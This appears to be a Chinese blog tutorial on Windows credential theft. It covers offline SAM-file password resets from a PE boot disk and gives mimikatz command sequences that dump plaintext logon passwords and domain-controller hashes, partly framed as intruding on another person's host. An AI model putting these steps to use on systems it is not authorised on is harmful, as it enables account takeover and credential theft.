admin 管理员组

文章数量: 887018

目录

  • 基于SAM文件的密码破解
  • Mimikatz是个啥?
    • mimikatz基础命令
    • 抓取windows密码
    • 使用mimikatz读取域控上所有域用户的hash值

基于SAM文件的密码破解

SAM文件即账号密码数据库文件。 当我们登录系统的时候,系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对,如发现此次密码与SAM文件中的加密数据符合时,你就会顺利登录;如果错误则无法登录。在系统运行期间,SAM文件一直是被占用的,是无法打开和编辑复制的,我们可以进入PE系统进行复制然后在利用软件进行密码的修改
U盘启动,运行DiskGenius分区工具
找到 SAM 文件,复制到U盘
在另一台电脑上下载软件 NTPWedit 并运行,打开 SAM 文件,解锁并修改密码,然后把 SAM 文件复制到原来的电脑上,覆盖原文件。或者我们可以直接利用工具(一般的启动盘PE中都有密码重置功能)一键重置。但是这样就完美的暴露了我们入侵了对方的主机
注意:这样只能修改密码,并不能知道密码的明文

Mimikatz是个啥?

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
注意:mimikatz的使用需要administrator权限,否则会提权失败。

mimikatz基础命令

• cls清屏
• exit退出
• version查看mimikatz的版本
• system::user查看当前登录的系统用户
• system::computer查看计算机名称
• process::list列出进程
• process::suspend 进程名称暂停进程
• process::stop 进程名称结束进程
• process::modules列出系统的核心模块及所在位置
• service::list列出系统的服务
• service::remove移除系统的服务
• service::start stop 服务名称启动或停止服务
• privilege::list列出权限列表
• privilege::enable激活一个或多个权限
• privilege::debug提升权限
• nogpo::cmd打开系统的cmd.exe
• nogpo::regedit打开系统的注册表
• nogpo::taskmgr打开任务管理器
• ts::sessions显示当前的会话
• ts::processes显示进程和对应的pid情况等
• sekurlsa::wdigest获取本地用户信息及密码
• sekurlsa::tspkg获取tspkg用户信息及密码
• sekurlsa::logonPasswords获登陆用户信息及密码

抓取windows密码

操作很简单,两步搞定
首先需要提权:privilege::debug

然后抓取明文密码:sekurlsa::logonPasswords

使用mimikatz读取域控上所有域用户的hash值

第一步依然是提升权限:privilege::debug
第二步抓取密码:lsadump::lsa /patch

本文标签: 管理员 密码 mimikatz Windows